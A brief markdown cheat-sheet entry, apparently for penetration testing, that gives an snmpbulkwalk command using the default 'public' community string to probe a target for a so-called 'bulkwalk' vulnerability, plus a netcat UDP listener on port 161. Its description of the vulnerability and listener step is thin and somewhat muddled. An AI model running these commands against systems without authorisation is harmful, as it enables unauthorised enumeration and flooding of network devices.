# snmpbulkwalk

## Command for POCing the "bulkwalk" vulnerability
```
snmpbulkwalk -v2c -c public -Cr1000 -On <target_IP> .1.3.6.1
```
* *`-Cr1000` indicates how many requests are sent*
* *`-On` sets output to be more human-readable*
* *`.1.3.6.1` is the OID being queried*

## Setup listener to "catch" the SNMP messages
```
nc -lup 161
```
